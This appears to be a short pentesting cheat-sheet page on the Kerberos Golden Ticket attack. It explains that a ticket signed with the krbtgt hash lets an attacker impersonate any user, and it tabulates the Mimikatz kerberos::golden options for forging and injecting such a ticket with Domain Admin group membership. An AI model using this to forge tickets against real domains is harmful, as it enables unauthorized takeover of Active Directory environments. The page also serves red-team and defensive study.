Golden Ticket
Golden ticket is signed and encrypted by the hash of krbtgt account which makes it a valid TGT ticket.
Using Golden ticket can be used to impersonate any user with any privileges.
Obtain krbtgt hash
There are multiple ways to get the krbtgt account hash
Create The Ticket
Options | |
---|---|
kerberos::golden | Name of the module |
/User:Administrator | Username for which the TGT is generated |
/domain: | Domain FQDN |
/sid: | SID of the domain |
/aes256: | AES256 keys of the krbtgt account |
/id:500 /groups:512 | Optional User and Group RID |
/ptt or /ticket | ptt: inject ticket to current process ticket: saves ticket to a file |
/startoffset:0 | Optional when the ticket is available in minutes. Use negative for a ticket available from past and a larger number for future. |
/endin:600 | Optional ticket lifetime in minutes. (default 10 years) The default AD setting is 10 hours = 600 minutes |
/renewmax:10080 | Optional ticket lifetime with renewal in minutes. (default is 10 years) The default AD setting is 7 days = 100800 |
Last updated